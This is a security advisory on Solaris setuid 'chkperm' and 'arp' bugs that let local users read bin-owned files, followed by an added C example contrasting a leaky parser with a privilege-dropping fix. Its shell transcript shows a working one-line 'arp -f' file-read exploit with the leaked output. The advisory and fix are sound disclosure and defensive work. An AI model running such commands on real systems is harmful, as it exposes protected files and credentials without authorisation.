Solaris 'chkperm' & 'arp' security vulnerabilities
3 Dec. 1999
Summary
'/usr/vmsys/bin/chkperm' and '/usr/sbin/arp' can be used to read bin-owned files. This lets an attacker read files to which they would normally have no read access and so learn more about the system (passwords, host configuration, etc.).
Credit:
The information has been provided by: Brock Tellier.
Vulnerable systems:
Sun Solaris 5.6
Sun Solaris 5.5.1
Sun Solaris 2.7
Sun Solaris 2.6
Vulnerability #1 - chkperm
This one isn't nearly as interesting as the instant-shell exploit variety, but it gives an attacker an opening. Here's how it works:
chkperm is suid/sgid bin as shown:
bash-2.02$ ls -la /usr/vmsys/bin/chkperm
-rwsr-sr-x 1 bin bin 10080 Sep 1 1998 /usr/vmsys/bin/chkperm
'/etc/bin' is a file owned by bin:bin with mode 660 (so it should not be readable by ordinary users), as shown:
bash-2.02$ ls -la /etc/bin
-rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
The output of reading the file through chkperm (not reproduced here) shows only four of its five lines; for some reason the last line is cut off. The meat of this exploit is that chkperm lets the caller choose, through the VMSYS environment variable, the directory in which it operates on its known file names.
This exploit is a variation on the old chkperm exploit, which allowed .facerc to be linked to '/usr/bin/.rhosts'. That particular problem was fixed, but this one was left behind.
Vulnerability #2 - arp
As with the first, any bin-owned file can be read:
bash-2.02$ ls -la /etc/bin
-rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
bash-2.02$ cat /etc/bin
cat: cannot open /etc/bin
bash-2.02$ /usr/sbin/arp -f /etc/bin
arp: bad line: seekret1
arp: bad line: seekret2
arp: bad line: seekret3
arp: bad line: seekret4
arp: bad line: seekret5
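Both findings above share one shape: a set-id program opens a path its unprivileged caller controls (a file argument for arp -f, a VMSYS directory for chkperm) using its elevated effective IDs, and arp then echoes every line it cannot parse straight back in a diagnostic. The following C program is an added example, not code from the advisory or from Sun: it reproduces that leak pattern against a constructed input file and sets a hardened variant beside it, which opens the caller-supplied path with the invoker's real uid/gid and reports only a line number. The entry format (hostname plus a colon-separated MAC, roughly what arp -f expects) and the sample file contents are assumptions made for the demonstration.

```c
/* Added example (not from the advisory): the "arp: bad line: ..." leak.
 * A set-id parser that opens a caller-supplied file with elevated IDs and
 * echoes unparseable lines becomes a reader for anything its effective
 * uid/gid can read.  Line format and sample file are constructed here. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define MAXLINE 256

struct parse_result {
    int good;           /* lines that looked like "host aa:bb:cc:dd:ee:ff" */
    int bad;            /* lines that did not */
    char leaked[2048];  /* everything a diagnostic would have echoed */
};

/* Crude entry check: two fields, the second with the five colons of a MAC. */
static int looks_like_arp_entry(const char *line)
{
    char host[MAXLINE], mac[MAXLINE];
    int colons = 0;
    if (sscanf(line, "%255s %255s", host, mac) != 2)
        return 0;
    for (const char *p = mac; *p; p++)
        if (*p == ':')
            colons++;
    return colons == 5;
}

/* Open a caller-supplied path with the invoker's real uid/gid, then
 * re-acquire the effective IDs from the saved set-IDs (a real arp still
 * needs them to load the kernel table).  Unprivileged, these are no-ops. */
static FILE *fopen_as_invoker(const char *path)
{
    uid_t euid = geteuid();
    gid_t egid = getegid();
    FILE *fp;
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return NULL;
    fp = fopen(path, "r");
    if (seteuid(euid) != 0 || setegid(egid) != 0) {  /* could not re-acquire */
        if (fp) fclose(fp);
        return NULL;
    }
    return fp;
}

/* Shared parser; echo_content selects the leaky diagnostic behaviour. */
static struct parse_result parse_stream(FILE *fp, int echo_content)
{
    struct parse_result r = {0, 0, ""};
    char line[MAXLINE];
    while (fgets(line, sizeof line, fp)) {
        line[strcspn(line, "\n")] = '\0';
        if (looks_like_arp_entry(line)) {
            r.good++;
        } else {
            r.bad++;
            if (echo_content) {   /* stand-in for fprintf(stderr, "arp: bad line: %s\n", line) */
                size_t used = strlen(r.leaked);
                snprintf(r.leaked + used, sizeof r.leaked - used, "arp: bad line: %s\n", line);
            }
        }
    }
    return r;
}

/* Vulnerable shape: open with the set-id privileges, echo offending lines. */
struct parse_result parse_arp_file_leaky(const char *path)
{
    struct parse_result r = {0, 0, ""};
    FILE *fp = fopen(path, "r");
    if (fp) { r = parse_stream(fp, 1); fclose(fp); }
    return r;
}

/* Hardened shape: open as the invoker, never echo file content
 * (the bad-line count is still a side channel, which is why the
 * privilege drop, not the quieter message, is the actual fix). */
struct parse_result parse_arp_file_safe(const char *path)
{
    struct parse_result r = {0, 0, ""};
    FILE *fp = fopen_as_invoker(path);
    if (fp) { r = parse_stream(fp, 0); fclose(fp); }
    return r;
}

/* Constructed sample: one valid entry, then the advisory's five secret
 * lines.  Call once; caller unlinks the returned temp file. */
const char *write_sample_file(void)
{
    static char path[] = "/tmp/arp-leak-XXXXXX";   /* mkstemp fills in XXXXXX */
    const char *body = "gw 00:11:22:33:44:55\nseekret1\nseekret2\nseekret3\nseekret4\nseekret5\n";
    int fd = mkstemp(path);
    if (fd < 0 || write(fd, body, strlen(body)) < 0)
        return NULL;
    close(fd);
    return path;
}
```

Run against the sample file, the leaky parser returns all five secret lines inside its diagnostics while the hardened one returns the same good/bad counts and an empty diagnostic buffer; when the binary is actually set-id, fopen_as_invoker also refuses the open outright for files the invoking user cannot read.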